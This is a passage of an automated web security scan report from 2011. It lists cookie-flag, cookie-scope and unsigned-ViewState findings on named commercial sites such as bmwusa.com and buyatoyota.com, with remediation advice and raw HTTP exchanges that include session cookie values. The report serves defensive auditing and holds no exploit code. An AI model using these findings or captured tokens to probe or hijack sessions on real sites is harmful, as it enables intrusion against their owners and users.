Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2o6rg0j8fbtu2n6kkit7kt2526; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113096

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.writingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

7. SSL cookie without secure flag set
There are 9 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


7.1. https://www.bmwusa.com/Secured/FrameCheck.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bmwusa.com
Path:   /Secured/FrameCheck.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw==
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:38 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; path=/; HttpOnly
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:38 GMT;path=/
Content-Length: 738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

7.2. https://www.lawschoolloans.com/lslprivateloan_application.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.lawschoolloans.com
Path:   /lslprivateloan_application.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lslprivateloan_application.php HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:09 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=a79edba2b2ee06d236e602f04f766868; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29907

<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws_scroll.js"></scr
...[SNIP]...

7.3. https://www.bmwusa.com/ScriptResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd?d=xsYbuK7UM5sZi4sgTCQGLxdtzGqRs1PKkQMgf2iUU6r30EQJogswAvyo68dvUJYTVgi5uVrBob_AaI2WwdpOUs8_OfdMRKIRvOzu3nlcdOKo4McHeCE-VXEOoDvGmIjUxMiOI8-p6cynHt62iKqWq_-WJ1JLRo_Mnr4cF1MdnWuuCYkNo73irNzDSQk-1A5oR5uIyg2&t=6eeae64a HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:45 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:45 GMT;path=/
Content-Length: 28550

...Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,
Bottom : 2,
Left : 3
}
AjaxControlToolk
...[SNIP]...

7.4. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secured/Content/Forms/Login.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:51:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:11:48 GMT;path=/
Content-Length: 212811


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

7.5. https://www.bmwusa.com/Secured/NaN

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/NaN

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secured/NaN HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw==
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 232
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:38 GMT
Connection: keep-alive
Set-Cookie: WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:38 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43">
...[SNIP]...

7.6. https://www.bmwusa.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=ZCit8Gm9Dm66VElz-Dlx7uNapXPkA4epDI8AMwu3sVIkDC0fSDwQQvsa6O8fmHTyDoiwD63Zl_78HL2Qp1KFWorQ7nM1&t=634222732007903694 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 20794
Content-Type: application/x-javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 22 Jan 2011 00:10:47 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:46 GMT;path=/

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...

7.7. https://www.bmwusa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.bmwusa.com/favicon.ico
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:11:09 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:31:09 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.bmwusa.com/favicon.ico">here</a>.</h2>
</body></html>

7.8. https://www.bmwusa.com/jsenvconst.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /jsenvconst.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsenvconst.ashx HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:43 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:43 GMT;path=/
Content-Length: 637

var WEBSITE_URL = "www.bmwusa.com";
var WEB_SERVICES_URL = "ws.bmwusa.com";
var WCF_SERVICES_URL = "ws.bmwusa.com";
var RESOURCE_SERVER_URL = "cache.bmwusa.com";
var MOBILE_URL = "m.bmwusa.com";

...[SNIP]...

7.9. https://www.lowermybills.com/lending/home-refinance/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowermybills.com
Path:   /lending/home-refinance/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lending/home-refinance/ HTTP/1.1
Host: www.lowermybills.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:22 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1295638882514991; path=/; expires=Sun, 20-Jan-13 19:41:22 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
ETag: W/"1447-1295483253000"
Last-Modified: Thu, 20 Jan 2011 00:27:33 GMT
Content-Length: 1447
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerpl.lmb2prod=872685578.20480.0000; path=/

<html>
<head>
<title></title>
<script type="text/javascript" language="javascript">
var userInfo = {
urlParams: {
jsEnabled: "Y",
resolution: "",

...[SNIP]...

8. ASP.NET ViewState without MAC enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.buyatoyota.com
Path:   /NationalLanding.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET /NationalLanding.aspx HTTP/1.1
Host: www.buyatoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 22:09:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: bgImage=Toyotathon_Flash_Piece; domain=.buyatoyota.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><!-- Page served fr
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
...[SNIP]...

9. Cookie scoped to parent domain
There are 27 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. http://www.directstartv.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.directstartv.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:40:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=hj0vosufv45apdqnbbc9nqnia2; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Fri, 20-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148176080; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160462422; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Tue, 22-Mar-2011 18:40:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

9.2. http://www.edfed.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.edfed.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:47 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=esnafiva63v7f9obfldsvpdko0; path=/; domain=edfed.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 154433

<script type="text/javascript" src="http://www.edfed.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.edfed.com/script/overlibmws_scroll.js"></script>
<script type="t
...[SNIP]...

9.3. http://www.employmentauthority.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.employmentauthority.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.employmentauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 86027

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Employment Services, Executive Employment, Executive Search Consultants, Executive Job Openings</title>
<met
...[SNIP]...

9.4. http://www.hound.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hound.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=125x125\ HTTP/1.1
Host: www.hound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
